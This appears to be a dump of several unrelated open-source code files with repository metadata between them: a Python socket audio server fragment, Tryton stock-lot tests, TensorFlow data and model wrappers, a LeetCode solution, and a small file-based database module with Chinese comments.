frames.append(data)
newClassLabel = sock.recv(BUFSIZE)
wave_output_filename = ("userRequestLabelDir/%s" % (newClassLabel,))
MakeAudioFileFromList(frames, wave_output_filename)
#elif (data == "ADD_USER") | (data == "ADD_USER\n"):
#elif data == "BUG_REPORT" | data == "BUG_REPORT\n":
elif len(data) == 0:
print('[INFO][%s] socket is closed frome the client -%s' % (ctime(), addr_info[0]))
else:
print('[INFO][%s] unknown data from client - %s' % (ctime(), addr_info[0]))
print data
def MakeAudioFileFromList(list, filename):
p = pyaudio.PyAudio()
print ("making wave file form audio stream")
wf = wave.open(filename + ".wav", 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(list))
wf.close()
p.terminate()
if __name__ == "__main__":
# TCP socket
serverSocket = socket(AF_INET, SOCK_STREAM)
# binding
serverSocket.bind(ADDR)
# listen, room size = 10
serverSocket.listen(10)
connection_list = [serverSocket]
print('==============================================')
print('START SIX SENSE SERVER... port: %s' % str(PORT))
print('==============================================')
while connection_list:
try:
print('[INFO] waiting request...')
#print s2("dog.wav")
# selection method,
read_socket, write_socket, error_socket = select(connection_list, [], [], 10)
for sock in read_socket:
# new connection
if sock == serverSocket:
clientSocket, addr_info = serverSocket.accept()
connection_list.append(clientSocket)
print('[INFO][%s] new client(%s) is connected to server...' % (ctime(), addr_info[0]))
# receive data form client
else:
data = sock.recv(BUFSIZE)
if data:
print('[INFO][%s] receive data from client - %s' % (ctime(), addr_info[0],))
print data
doOperation(data, addr_info[0], sock)
connection_list.remove(sock)
sock.close()
else:
print('[INFO][%s] receive null data from client - %s' % (ctime(), addr_info[0],))
connection_list.remove(sock)
sock.close()
except KeyboardInterrupt:
# good way to terminate
serverSocket.close()
sys.exit()
| [
"rocky92.lim@gmail.com"
] | rocky92.lim@gmail.com |
98a0eb413768739d94890ec9443376e800d155f7 | 82c2c1ac7a727bb68454e61f3b0ad6399a49126e | /utils/json.py | 206423b90cf4b6c71ea36b69bbe2693d7b59fe6f | [] | no_license | pradoslaw/coyote-ws | d2e9f4fb793e1ddcab4b65138fb17ff36c92ee66 | b3a14597b3cd795ff70e90c779191e4bb2f5f3c2 | refs/heads/master | 2023-05-09T16:22:27.683405 | 2021-06-10T18:15:40 | 2021-06-10T18:15:40 | 51,928,970 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from json import loads
def is_valid_json(message):
try:
obj = loads(message)
except ValueError:
return False
return obj | [
"adam@boduch.net"
] | adam@boduch.net |
c3ca2d48fc3106d240183f94624a9d8af3cbb55a | 660e35c822423685aea19d038daa8356722dc744 | /stock_lot/tests/test_stock_lot.py | 7fdaf10723fc7fdb663b0c5c7b29412cb8e8023d | [] | no_license | saifkazi/tryton_modules | a05cb4a90ae2c46ba39d60d2005ffc18ce5e44bb | 94bd3a4e3fd86556725cdff33b314274dcb20afd | refs/heads/main | 2023-05-05T12:20:02.059236 | 2021-05-19T10:46:37 | 2021-05-19T10:46:37 | 368,768,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,168 | py | # This file is part of Tryton. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
import unittest
import doctest
import datetime
from dateutil.relativedelta import relativedelta
from decimal import Decimal
import trytond.tests.test_tryton
from trytond.tests.test_tryton import ModuleTestCase, with_transaction
from trytond.tests.test_tryton import doctest_teardown
from trytond.tests.test_tryton import doctest_checker
from trytond.transaction import Transaction
from trytond.pool import Pool
from trytond.modules.company.tests import create_company, set_company
class StockLotTestCase(ModuleTestCase):
'Test Stock Lot module'
module = 'stock_lot'
@with_transaction()
def test_products_by_location(self):
'Test products_by_location'
pool = Pool()
Uom = pool.get('product.uom')
Template = pool.get('product.template')
Product = pool.get('product.product')
Location = pool.get('stock.location')
Move = pool.get('stock.move')
Lot = pool.get('stock.lot')
kg, = Uom.search([('name', '=', 'Kilogram')])
g, = Uom.search([('name', '=', 'Gram')])
template, = Template.create([{
'name': 'Test products_by_location',
'type': 'goods',
'list_price': Decimal(0),
'default_uom': kg.id,
}])
product, = Product.create([{
'template': template.id,
}])
supplier, = Location.search([('code', '=', 'SUP')])
customer, = Location.search([('code', '=', 'CUS')])
storage, = Location.search([('code', '=', 'STO')])
company = create_company()
currency = company.currency
with set_company(company):
lot1, lot2 = Lot.create([{
'number': '1',
'product': product.id,
}, {
'number': '2',
'product': product.id,
}])
moves = Move.create([{
'product': product.id,
'lot': lot1.id,
'uom': kg.id,
'quantity': 5,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': kg.id,
'quantity': 10,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': kg.id,
'quantity': 2,
'from_location': storage.id,
'to_location': customer.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': None,
'uom': kg.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}])
Move.do(moves)
self.assertEqual(Product.products_by_location([storage.id],
grouping_filter=([product.id],)), {
(storage.id, product.id): 16,
})
self.assertEqual(Product.products_by_location([storage.id],
grouping=('product', 'lot',),
grouping_filter=([product.id],)), {
(storage.id, product.id, lot1.id): 5,
(storage.id, product.id, lot2.id): 8,
(storage.id, product.id, None): 3,
})
with Transaction().set_context(locations=[storage.id]):
lot1, lot2 = Lot.browse([lot1, lot2])
self.assertEqual(lot1.quantity, 5)
self.assertEqual(lot2.quantity, 8)
@with_transaction()
def test_period(self):
'Test period'
pool = Pool()
Uom = pool.get('product.uom')
Template = pool.get('product.template')
Product = pool.get('product.product')
Location = pool.get('stock.location')
Move = pool.get('stock.move')
Lot = pool.get('stock.lot')
Period = pool.get('stock.period')
unit, = Uom.search([('name', '=', 'Unit')])
template, = Template.create([{
'name': 'Test period',
'type': 'goods',
'default_uom': unit.id,
'list_price': Decimal(0),
}])
product, = Product.create([{
'template': template.id,
}])
supplier, = Location.search([('code', '=', 'SUP')])
storage, = Location.search([('code', '=', 'STO')])
company = create_company()
currency = company.currency
with set_company(company):
lot1, lot2 = Lot.create([{
'number': '1',
'product': product.id,
}, {
'number': '2',
'product': product.id,
}])
today = datetime.date.today()
moves = Move.create([{
'product': product.id,
'lot': lot1.id,
'uom': unit.id,
'quantity': 5,
'from_location': supplier.id,
'to_location': storage.id,
'planned_date': today - relativedelta(days=1),
'effective_date': today - relativedelta(days=1),
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': unit.id,
'quantity': 10,
'from_location': supplier.id,
'to_location': storage.id,
'planned_date': today - relativedelta(days=1),
'effective_date': today - relativedelta(days=1),
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}, {
'product': product.id,
'lot': None,
'uom': unit.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'planned_date': today - relativedelta(days=1),
'effective_date': today - relativedelta(days=1),
'company': company.id,
'unit_price': Decimal('1'),
'currency': currency.id,
}])
Move.do(moves)
period, = Period.create([{
'date': today - relativedelta(days=1),
'company': company.id,
}])
Period.close([period])
self.assertEqual(period.state, 'closed')
quantities = {
supplier: -18,
storage: 18,
}
for cache in period.caches:
self.assertEqual(cache.product, product)
self.assertEqual(cache.internal_quantity,
quantities[cache.location])
quantities = {
(supplier, lot1): -5,
(storage, lot1): 5,
(supplier, lot2): -10,
(storage, lot2): 10,
(supplier, None): -3,
(storage, None): 3,
}
for lot_cache in period.lot_caches:
self.assertEqual(lot_cache.product, product)
self.assertEqual(lot_cache.internal_quantity,
quantities[(lot_cache.location, lot_cache.lot)])
@with_transaction
def test_assign_try_with_lot(self):
"Test Move assign_try with lot"
pool = Pool()
Template = pool.get('product.template')
Product = pool.get('product.product')
Uom = pool.get('product.uom')
Location = pool.get('stock.location')
Move = pool.get('stock.move')
Lot = pool.get('stock.lot')
uom, = Uom.search([('name', '=', 'Meter')])
template = Template(
name="Product",
type='goods',
list_price=Decimal(1),
default_uom=uom,
)
template.save()
product = Product(template=template.id)
product.save()
supplier, = Location.search([('code', '=', 'SUP')])
storage, = Location.search([('code', '=', 'STO')])
customer, = Location.search([('code', '=', 'CUS')])
company = create_company()
with set_company(company):
lot1, lot2 = Lot.create([{
'number': "1",
'product': product.id,
}, {
'number': "2",
'product': product.id,
}])
moves = Move.create([{
'product': product.id,
'lot': lot1.id,
'uom': uom.id,
'quantity': 2,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}, {
'product': product.id,
'lot': lot2.id,
'uom': uom.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}, {
'product': product.id,
'lot': None,
'uom': uom.id,
'quantity': 3,
'from_location': supplier.id,
'to_location': storage.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}])
Move.do(moves)
move, = Move.create([{
'product': product.id,
'uom': uom.id,
'quantity': 10,
'from_location': storage.id,
'to_location': customer.id,
'company': company.id,
'unit_price': Decimal(1),
'currency': company.currency.id,
}])
self.assertFalse(
Move.assign_try([move], grouping=('product', 'lot')))
moves = Move.search([
('product', '=', product.id),
('from_location', '=', storage.id),
('to_location', '=', customer.id),
('company', '=', company.id),
])
self.assertEqual(len(moves), 4)
self.assertEqual({
(m.lot, m.quantity, m.state) for m in moves}, {
(lot1, 2, 'assigned'),
(lot2, 3, 'assigned'),
(None, 1, 'assigned'),
(None, 4, 'draft'),
})
def suite():
suite = trytond.tests.test_tryton.suite()
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(
StockLotTestCase))
suite.addTests(doctest.DocFileSuite('scenario_stock_lot_shipment_out.rst',
tearDown=doctest_teardown, encoding='utf-8',
checker=doctest_checker,
optionflags=doctest.REPORT_ONLY_FIRST_FAILURE))
return suite
| [
"saif.kazi76@gmail.com"
] | saif.kazi76@gmail.com |
4bff47136dc598c93846a18cfc7873b43bbf4eef | d31c5d6fa72d058d0f6de6aca5b3ab0822b0deaf | /tfrecord_reader.py | 10e5abc8b57fc3e0d25437bc5fff7a86042334e9 | [] | no_license | you359/TFRecordGenerator | deaf14584416c73325893de984b3a65da02d35d7 | 3580926e052268cc22260fd3c28594bc3c623180 | refs/heads/master | 2020-04-07T12:22:32.556446 | 2018-11-20T10:17:01 | 2018-11-20T10:17:01 | 158,365,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,118 | py | import tensorflow as tf
import glob
def _parse(record):
features = {
# 'image/encoded': tf.FixedLenFeature([], tf.string),
'data/encoded': tf.FixedLenFeature([], tf.string),
'data/height': tf.FixedLenFeature([], tf.int64),
'data/width': tf.FixedLenFeature([], tf.int64),
'data/depth': tf.FixedLenFeature([], tf.int64),
'data/class/label': tf.FixedLenFeature([], tf.int64),
'data/class/name': tf.FixedLenFeature([], tf.string)
}
parsed_record = tf.parse_single_example(record, features)
# image = tf.decode_raw(parsed_record['image/encoded'], tf.float32)
image = tf.image.decode_image(parsed_record['data/encoded'])
height = tf.cast(parsed_record['data/height'], tf.int32)
width = tf.cast(parsed_record['data/width'], tf.int32)
channel = tf.cast(parsed_record['data/depth'], tf.int32)
image = tf.reshape(image, [height, width, channel])
image = tf.image.resize_images(image, (299, 299))
label = tf.cast(parsed_record['data/class/label'], tf.int32)
lebel_name = tf.cast(parsed_record['data/class/name'], tf.string)
return image, label, lebel_name
# train_input_fn = data_input_fn(glob.glob('H:/train_*.tfrecord'), shuffle=True)
# validation_input_fn = data_input_fn(glob.glob('H:/val_*.tfrecord'))
import matplotlib.pyplot as plt
with tf.Graph().as_default():
with tf.Session() as sess:
dataset = tf.data.TFRecordDataset(glob.glob('./train_*.tfrecord')).map(_parse)
if True:
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.repeat(None) # Infinite iterations: let experiment determine num_epochs
dataset = dataset.batch(64)
iterator = dataset.make_one_shot_iterator()
# iterator = dataset.make_initializable_iterator()
features, labels, name = iterator.get_next()
# sess.run(iterator)
for i in range(10):
d_l = sess.run(name)
print(d_l[0])
# print(d_n[0])
# plt.imshow(d_f[0])
# plt.show()
# print(len(sess.run(features)))
| [
"you359@koreatech.ac.kr"
] | you359@koreatech.ac.kr |
84943acbf7b7b989ac08e4c3d173d53799243119 | 2dd560dc468af0af4ca44cb4cd37a0b807357063 | /Leetcode/1170. Compare Strings by Frequency of the Smallest Character/solution2.py | f55713f52de924d420434c926569d1d9fb130de7 | [
"MIT"
] | permissive | hi0t/Outtalent | 460fe4a73788437ba6ce9ef1501291035c8ff1e8 | 8a10b23335d8e9f080e5c39715b38bcc2916ff00 | refs/heads/master | 2023-02-26T21:16:56.741589 | 2021-02-05T13:36:50 | 2021-02-05T13:36:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from bisect import bisect
class Solution:
def numSmallerByFrequency(self, queries: List[str], words: List[str]) -> List[int]:
f = sorted([w.count(min(w)) for w in words])
return [len(f) - bisect(f, q.count(min(q))) for q in queries]
| [
"info@crazysquirrel.ru"
] | info@crazysquirrel.ru |
932f0f3ca464a0e327e0dcff6fe1f74ce0621071 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /routing_transformer/routing_tf_api.py | 62feaeaa11136632e25caf46ffb158383e6714e4 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 7,727 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pdb
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
tf.get_logger().setLevel('ERROR')
from tensor2tensor import models
from tensor2tensor import problems
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import hparams_lib
from tensor2tensor.utils import registry
from tensor2tensor.utils import metrics
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.data_generators import problem
from routing_transformer.problems import pg19
from tensorflow.compat.v1 import estimator as tf_estimator
from tqdm import tqdm
from routing_transformer.sparse_transformer import SparseTransformer
import numpy as np
import random
from scipy.special import log_softmax
VOCAB_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-data/vocab.pg19_length8k.32768.subwords"
HPARAMS_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/hparams.json"
CKPT_PATH = "/mnt/nfs/work1/miyyer/simengsun/in-book-retrieval/RT-models/rt-checkpoint/ckpt-3530000"
MAX_SEQUENCE_LENGTH = 8192
class SparseTransformerWrapper(object):
def __init__(self, max_seq_length=None):
# Load hyperparameters
self.max_seq_length = max_seq_length or MAX_SEQUENCE_LENGTH
# Needed since RT uses blocks of size 256
assert self.max_seq_length % 256 == 0
hparams = hparams_lib.create_hparams_from_json(HPARAMS_PATH)
hparams.use_tpu = False
hparams = zero_dropout(hparams)
# Build TF1 graph of model
sptf_model = SparseTransformer(hparams, tf_estimator.ModeKeys.EVAL)
self.input_nodes = {
"targets": tf.placeholder(tf.int32, [None, self.max_seq_length])
}
self.output_nodes = sptf_model.body(self.input_nodes)
# Map the checkpoint variables to the graph
init_from_checkpoint(CKPT_PATH, variable_prefix="sparse_transformer/body")
# create a session object, and actually initialize the graph
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.encoder = text_encoder.SubwordTextEncoder(VOCAB_PATH)
def forward(self, sentences, encode_sentences=True, relevant_subsequences=None):
encoded_sents = []
encoded_seqs_no_pad = []
if encode_sentences:
for sent in sentences:
encoded = []
for line in sent.split("\n"):
new_tokens = self.encoder.encode(line.strip())
if len(encoded) + len(new_tokens) >= self.max_seq_length:
break
encoded.extend(new_tokens)
encoded.append(text_encoder.EOS_ID)
encoded_seqs_no_pad.append(encoded)
# pad shorter sequences to the full length
encoded = encoded + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(encoded))]
assert len(encoded) == self.max_seq_length
encoded_sents.append(encoded)
else:
# assume sentences are encoded, pad/truncate them
for sent in sentences:
sent = sent[:self.max_seq_length]
encoded_seqs_no_pad.append(sent)
sent = sent + [text_encoder.PAD_ID for _ in range(self.max_seq_length - len(sent))]
encoded_sents.append(sent)
feed_dict = {
self.input_nodes["targets"]: np.array(encoded_sents)
}
outputs = self.sess.run(self.output_nodes, feed_dict=feed_dict)
return_outputs = {
"logits": np.squeeze(outputs[0], axis=(2, 3)),
"loss": outputs[1]["training"],
"encoded_seqs_no_pad": encoded_seqs_no_pad
}
if relevant_subsequences is not None:
for i, rss in enumerate(relevant_subsequences):
encoded_subseq = self.encoder.encode(rss)
positions = find_sub_list(encoded_subseq, encoded_sents[i])
misaligned_prefix_length = 0
while positions is None:
misaligned_prefix_length += 1
encoded_subseq = encoded_subseq[1:]
positions = find_sub_list(encoded_subseq, encoded_sents[i])
start, end = positions[-1]
relevant_logits = return_outputs["logits"][i][start:end]
log_probs = log_softmax(relevant_logits, axis=1)
gold_log_probs = [lp[index] for index, lp in zip(encoded_subseq, log_probs)]
return_outputs["subseq_log_loss"] = -1 * np.mean(gold_log_probs)
return_outputs["misaligned_prefix_length"] = misaligned_prefix_length
return return_outputs
def close(self):
self.sess.close()
def find_sub_list(sl, l):
"""Find sub-string, so as to be able to compute ppl of a sub-string."""
sll=len(sl)
matches = []
for ind in (i for i,e in enumerate(l) if e == sl[0]):
if l[ind:ind + sll] == sl:
matches.append(
(ind, ind + sll)
)
if matches:
return matches
def zero_dropout(hparams):
hparams.input_dropout = 0.0
hparams.dropout = 0.0
hparams.relu_dropout = 0.0
hparams.attention_dropout = 0.0
hparams.layer_prepostprocess_dropout = 0.0
return hparams
def log_variables(name, var_names):
tf.logging.info("%s (%d total): %s", name, len(var_names),
random.sample(var_names, min(len(var_names), 5)))
def init_from_checkpoint(checkpoint_path,
checkpoint_prefix=None,
variable_prefix=None,
target_variables=None):
"""Initializes all of the variables using `init_checkpoint."""
tf.logging.info("Loading variables from %s", checkpoint_path)
checkpoint_variables = {
name: name for name, _ in tf.train.list_variables(checkpoint_path) if "Adafactor" not in name
}
if target_variables is None:
target_variables = tf.trainable_variables()
target_variables = {var.name.split(":")[0]: var for var in target_variables}
if checkpoint_prefix is not None:
checkpoint_variables = {
checkpoint_prefix + "/" + name: varname
for name, varname in checkpoint_variables.items()
}
if variable_prefix is not None:
target_variables = {
variable_prefix + "/" + name: var
for name, var in target_variables.items()
}
checkpoint_var_names = set(checkpoint_variables.keys())
target_var_names = set(target_variables.keys())
intersected_var_names = target_var_names & checkpoint_var_names
assignment_map = {
checkpoint_variables[name]: target_variables[name]
for name in intersected_var_names
}
tf.train.init_from_checkpoint(checkpoint_path, assignment_map)
log_variables("Loaded variables", intersected_var_names)
log_variables("Uninitialized variables", target_var_names - checkpoint_var_names)
log_variables("Unused variables", checkpoint_var_names - target_var_names)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
8ef782168d9426a05d7c3eba58168c3c1960a475 | 8e0c257beaefd47b8906901c8359c7748cc91bdf | /core/dblite/dblite.py | 48d24561f72eb795d5435fd2ae24080da4686f85 | [] | no_license | Reqin/tft_rebuild | fc2d917e7bb4ff097d7473da8d5110eddca9ebc4 | 2745d3e1ab84b5931ab018e49f7eb245304d8109 | refs/heads/master | 2022-11-27T23:28:51.421917 | 2020-07-26T10:53:25 | 2020-07-26T10:53:25 | 279,995,549 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,032 | py | """
@author: Reqin
@desc: 这是此项目的数据驱动程序。
除了用于程序初始化的配置信息之外,所有文本数据的增、删、查、改必须通过这个这个程序进行。
此程序的数据规范如下:
1. 此程序读取 .db 文件
2. 每一个 .db 文件里包含的数据必须是同一类数据,每一类数据的用途必须严格一致
3. .db 文件只存储文本数据,且文本数据的意义表征只能是严格的文本,不用于解码等其他操作
4. .db 文件的第一行是此文件中所有数据的索引,且索引必须为非数字,且不能重复
5. .db 文件没有严格意义上的数据纵向排列,不能存在两行相同的数据,数据的重复不会被读取,也无法写入重复的数据
6. .db 文件字段之间使用 英文标点冒号 隔开用于表征和识别字段数据
7. .db 文件现阶段只进行小文件操作,使用者需要避免 .db 文件过大
8. 为了更好的鲁棒性 尽量使得每个字段中的值简单化是一个明智的选择
"""
import os
import copy
import collections
from core.filePipe.pipe import read_all, add_line
from core.filePipe.pipe import __touch as touch
from core.filePipe.pipe import __clear as clear
from lib import logger
from functools import wraps
from lib import config_init, config_parser
import shutil
def is_empty_table(func):
@wraps(func)
def wrapper(*args, **kwargs):
args = copy.copy(args)
table = args[0]
if not table.fields:
logger.info("执行中止,不能对空表进行此操作,表名:{},中断参数:{} -- {},".format(table.name, args, kwargs))
return -1
else:
return func(*args, **kwargs)
return wrapper
class Table:
def __init__(self, config):
self.index = config.index
self.name = config.default_table_name
self.path = config.path
self.swap_file_suffix = config.swap_file_suffix
self.swap_path = self.path + self.swap_file_suffix
self.metadata = None
self.encode_type = list
self.decode_type = str
self.fields = []
self.data = []
self.__load_data()
def __load_data(self):
self.file_data = read_all(self.path).strip().split(os.linesep)
self.file_fields = self.file_data[0]
if not self.file_fields:
logger.info("读取到空表 path:{}".format(self.path))
else:
fields = self.__decode(self.file_fields)
self.fields = fields
if not self.fields:
return
self.metadata = collections.namedtuple("TABLE", self.fields)
self.encode_type = self.metadata
for file_line in self.file_data:
data_line = self.__decode(file_line)
if len(self.fields) == len(data_line):
new_data = self.metadata(*data_line)
if new_data in self.data:
logger.warning("表中存在重复的数据,表:{} 数据:{}".format(self.name, data_line))
else:
self.data.append(new_data)
else:
logger.warning("表数据异常,表:{},数据:{}".format(self.name, file_line))
def refresh(self):
self.__load_data()
# 将每一行的文件数据转为数据表数据
def __encode(self, data):
if not isinstance(data, self.encode_type):
logger.error("数据格式错误,数据:{},标准格式:{}".format(data, self.encode_type))
return False
else:
line = "{}".format(data[0])
for one in data[1:]:
line += "!&:{}".format(one)
return line
# 将一个数据表记录转为数据表文件标准格式
def __decode(self, line):
if not isinstance(line, self.decode_type):
logger.error("数据格式错误,数据:{},标准格式:{}".format(line, self.decode_type))
return False
else:
return line.split("!&:")
def __update_file(self):
touch(self.swap_path)
clear(self.swap_path)
for data_line in self.data:
file_line = self.__encode(data_line)
add_line(self.swap_path, file_line)
try:
os.remove(self.path)
os.rename(self.swap_path, self.path)
except Exception as e:
logger.critical("更新失败,数据文件时出现异常,文件路径:{},交换路径:{}".format(self.path, self.swap_path))
def get_fields(self):
return self.fields
def create(self, fields):
if self.data:
logger.info("失败,无法在未清空的表中创建新表,表文件路径:{}".format(self.path))
return False
self.fields = fields
self.__load_data()
# exit()
# self.data = []
if self.insert(fields, fields):
logger.info("成功,已创建表,表字段:{}".format(fields))
@is_empty_table
def clear(self):
if clear(self.path):
logger.info("成功,已清空表,表文件路径:{}".format(self.path))
self.file_data = []
self.data = []
self.encode_type = list
return True
else:
logger.info("失败,未清空表,文件异常,表文件路径:{}".format(self.path))
return False
@is_empty_table
def insert(self, fields, values):
if not isinstance(fields, list) or not isinstance(values, list):
logger.error("数据格式错误,插入失败,标准格式:{} 未能和字段:{} 数据:{} 完全匹配".format(list, fields, values))
return 0
if len(fields) != len(values):
logger.error("数据长度错误,插入失败,字段:{} 未能和值:{} 完全匹配".format(fields, values))
return 0
if fields != self.fields:
logger.error("数据字段错误,插入失败,标准字段:{} 未能和字段:{} 完全匹配".format(self.fields, fields))
return 0
new_data = self.metadata(*values)
if new_data in self.data:
logger.warning("不允许数据重复,数据:{} 已存在".format(values))
return 0
else:
line = self.__encode(new_data)
if line:
add_line(self.path, line)
else:
logger.warning("数据编码失败,数据:{}".format(new_data))
return False
self.data.append(new_data)
logger.info("成功,插入数据,表索引:{},数据:{}".format(self.index, new_data))
return True
# noinspection PyArgumentList
@is_empty_table
def update(self, trait, change):
old_records = self.retrieve(*trait)
if not old_records:
logger.warning("警告,不存在旧记录:{}".format(old_records))
return None
new_records = []
for old_record in old_records:
new_value = []
for field in self.fields:
if field not in change.keys():
new_value.append(old_record.__getattribute__(field))
else:
new_value.append(change[field])
new_record = self.metadata(*new_value)
new_records.append(new_record)
self.data[self.data.index(old_record)] = new_record
if new_records != old_records:
self.__update_file()
return new_records
else:
logger.info("已动作,数据无变化,旧记录:{},新记录:{}".format(old_records, new_records))
return 0
@is_empty_table
def retrieve(self, field, value):
records = []
if field not in self.fields:
logger.warning("在字段 {} 中查询不存在的字段: {}".format(self.fields, field))
else:
records = [record for record in self.data if record.__getattribute__(field) == value]
if not records:
logger.info("字段 {} 中未查询到数据: {}".format(field, value))
return records
@is_empty_table
def delete(self, namedtuple_item):
if namedtuple_item in self.data:
self.data.remove(namedtuple_item)
self.__update_file()
logger.info("成功,删除表数据,表:{},数据:{}".format(self.index, namedtuple_item))
else:
logger.warning("失败,尝试删除不存在的数据,表:{},数据:{}".format(self.index, namedtuple_item))
@is_empty_table
def all(self):
return self.data[1:]
def get_table(db, index):
keys = index.split(".")
# 切换数据表所在的数据库
for key in keys[:-1]:
if isinstance(db, DB):
if key in db.dbs:
db = db.dbs[key]
# logger.info("成功,已读取数据库,索引:{}".format(db.index))
else:
logger.error("不存在的数据库索引:{}".format(index))
return False
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据库数据{} 类型不匹配".format(db, DB))
return False
table_name = keys[-1]
if table_name in db.dbs.keys():
table = db.dbs[table_name]
if isinstance(table, Table):
logger.info("成功,已读取数据表,索引:{}".format(table.index))
return table
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据表数据{} 类型不匹配".format(table, Table))
return False
else:
logger.error("不存在的数据表索引:{}".format(index))
return None
pass
def set_table(db, index, new_table):
if not isinstance(new_table, Table):
logger.critical("错误!数据异常,数据:{} 与 标准数据表数据{} 类型不匹配".format(new_table, Table))
return
keys = index.split(".")
# 切换数据表所在的数据库
for key in keys[:-1]:
if isinstance(db, DB):
if key in db.dbs:
db = db.dbs[key]
# logger.info("成功,已读取数据库,索引:{}".format(db.index))
else:
logger.error("不存在的数据库索引:{}".format(index))
return False
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据库数据{} 类型不匹配".format(db, DB))
return False
table_name = keys[-1]
if table_name in db.dbs.keys():
old_table = db.dbs[table_name]
if isinstance(old_table, Table):
logger.info("成功,已读取数据表,索引:{}".format(old_table.index))
db.dbs[table_name] = new_table
return True
else:
logger.critical("错误!数据异常,数据:{} 与 标准数据表数据{} 类型不匹配".format(old_table, Table))
return False
else:
logger.error("不存在的数据表索引:{}".format(index))
return False
def auto_get_table(func):
@wraps(func)
def wrapper(*args, **kwargs):
args = copy.copy(args)
db = args[0]
index = args[1]
table = get_table(db, index)
if isinstance(table, Table):
return func(*args, **kwargs, table=table)
else:
return -1
return wrapper
class DB:
    """A directory-backed database: sub-directories become nested DBs and
    files with the configured suffix become Table objects.

    CRUD-style methods take a dotted *index* ("db.subdb.table"); most are
    wrapped by @auto_get_table, which resolves the index and injects the
    ``table`` keyword argument (returning -1 on a bad index).
    """
    type = {
        1: "DB",
        2: "TABLE"
    }
    def __init__(self, config):
        # Deep-copy the config: __load_data mutates it per child entry.
        self.config = copy.deepcopy(config)
        self.index = self.config.index
        self.__path = config.path
        self.__suffix = config.suffix
        self.name = config.default_db_name
        self.dbs = {}
        self.__load_data()
    def __load_data(self):
        """Scan self.__path, building child DBs (dirs) and Tables (files)."""
        config = copy.deepcopy(self.config)
        db_index = config.index
        for item in os.listdir(self.__path):
            path = os.path.join(self.__path, item)
            config.path = path
            config.default_db_name = item
            if os.path.isdir(path):
                # Directories recurse into nested DB instances.
                if not db_index:
                    db_index = item
                else:
                    db_index = "{}.{}".format(db_index, item)
                config.index = db_index
                self.dbs[item] = DB(config)
                logger.info("成功,已加载库,索引:{}".format(db_index))
            else:
                # Only files with the configured suffix become tables.
                name, suffix = os.path.splitext(item)
                if suffix == self.__suffix:
                    config.default_table_name = name
                    table_index = "{}.{}".format(db_index, name)
                    config.index = table_index
                    self.dbs[name] = Table(config)
                    logger.info("成功,已加载表,索引:{}".format(table_index))
    @auto_get_table
    def insert(self, index, fields, values, table=None):
        del index
        return table.insert(fields, values)
    @auto_get_table
    def update(self, index, trait, change, table=None):
        del index
        return table.update(trait, change)
    @auto_get_table
    def refresh_table(self, index, table=None):
        # Re-read the table from disk and swap it into the tree.
        new_table = table.refresh()
        set_table(self, index, new_table)
        return True
    @auto_get_table
    def get_fields(self, index, table=None):
        del index
        return table.get_fields()
    @auto_get_table
    def retrieve(self, index, field, value, table=None):
        del index
        return table.retrieve(field, value)
    @auto_get_table
    def delete(self, index, namedtuple_item, table=None):
        return table.delete(namedtuple_item)
    @auto_get_table
    def all_table_data(self, index, table=None):
        del index
        return table.all()
    def generate_table(self, index, fields):
        """Create (if missing), clear and initialise the table at *index*."""
        path = self.__path
